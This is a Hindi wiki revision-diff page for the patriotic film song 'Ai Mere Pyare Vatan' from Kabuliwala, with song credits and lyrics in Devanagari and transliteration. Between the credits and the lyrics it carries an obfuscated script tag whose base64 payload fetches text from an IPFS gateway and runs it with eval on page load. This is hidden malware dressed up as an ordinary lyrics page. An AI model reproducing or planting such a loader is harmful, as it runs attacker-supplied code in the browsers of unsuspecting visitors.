Difference between revisions of "ऐ मेरे प्यारे वतन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} {{Poemopen}} <poem> ऐ मेरे प्यारे वतन, ऐ मेरे बिछड़े ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
{| class="bharattable-pink" align="right"
 +
|+ संक्षिप्त परिचय
 +
|-
 +
|
 +
* फ़िल्म : काबुलीवाला
 +
* संगीतकार : सलिल चौधरी
 +
* गायक : [[मन्ना डे]]
 +
* गीतकार: प्रेम धवन
 +
|}
 
{{Poemopen}}
 
{{Poemopen}}
 
<poem>
 
<poem>
Line 5: Line 13:
 
तुझपे दिल कुर्बान, तू ही मेरी आरज़ू
 
तुझपे दिल कुर्बान, तू ही मेरी आरज़ू
 
तू ही मेरी आबरू, तू ही मेरी जान
 
तू ही मेरी आबरू, तू ही मेरी जान
 +
 +
तेरे दामन से जो आए उन हवाओं को सलाम
 +
चूम लूँ मैं उस ज़ुबां को जिसपे आए तेरा नाम
 +
सबसे प्यारी सुबह तेरी, सबसे रंगीं तेरी शाम
 +
तुझपे दिल कुर्बान...
  
 
माँ का दिल बन के कभी सीने से लग जाता है तू
 
माँ का दिल बन के कभी सीने से लग जाता है तू
Line 11: Line 24:
 
तुझपे दिल कुर्बान...
 
तुझपे दिल कुर्बान...
  
तेरे दामन से जो आए उन हवाओं को सलाम
+
छोड़ कर तेरी ज़मीं को दूर आ पहुंचे हैं हम
चूम लूँ मैं उस ज़ुबां को जिसपे आए तेरा नाम
+
फिर भी ये ही तमन्ना तेरे ज़र्रों की कसम
सबसे प्यारी सुबह तेरी, सबसे रंगीं तेरी शाम
+
हम जहाँ पैदा हुए, उस जगह ही निकले दम
तुझपे दिल कुर्बान...
 
 
 
छोड़ कर तेरी गली को दूर आ पहुंचे हैं हम
 
है मगर ये ही तमन्ना तेरे ज़र्रों की कसम
 
जिस जगह पैदा हुए थे, उस जगह ही निकले दम
 
 
तुझपे दिल कुर्बान...
 
तुझपे दिल कुर्बान...
 
</poem>
 
</poem>
 
{{Poemclose}}
 
{{Poemclose}}
  
* फिल्म : काबुलीवाला
 
* संगीतकार :
 
* स्वर :
 
* रचनाकार : गुलजार
 
  
  
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
+
*[http://www.youtube.com/watch?v=cIYebqbF1fo ऐ मेरे प्यारे वतन (यू-ट्यूब)]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{देश भक्ति गीत}}
[[Category:नया पन्ना दिसंबर-2011]]
+
[[Category:फ़िल्मी गीत]]
 
+
[[Category:देश भक्ति गीत]]
 +
[[Category:संगीत]]
 +
[[Category:संगीत कोश]]
 +
[[Category:सिनेमा]]
 +
[[Category:सिनेमा कोश]]
 
__INDEX__
 
__INDEX__
[[Category:देश_भक्ति_गीत]]
+
__NOTOC__

Revision as of 08:46, 7 January 2012

sankshipt parichay
  • film : kabulivala
  • sangitakar : salil chaudhari
  • gayak : manna de
  • gitakar: prem dhavan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ai mere pyare vatan, ai mere bichh de chaman
tujhape dil kurban, too hi meri arazoo
too hi meri abaroo, too hi meri jan

tere daman se jo ae un havaoan ko salam
choom looan maian us zubaan ko jisape ae tera nam
sabase pyari subah teri, sabase rangian teri sham
tujhape dil kurban...

maan ka dil ban ke kabhi sine se lag jata hai too
aur kabhi nanhian si beti ban ke yad ata hai too
jitana yad ata hai mujhako, utana t dapata hai too
tujhape dil kurban...

chho d kar teri zamian ko door a pahuanche haian ham
phir bhi ye hi tamanna tere zarroan ki kasam
ham jahaan paida hue, us jagah hi nikale dam
tujhape dil kurban...


tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh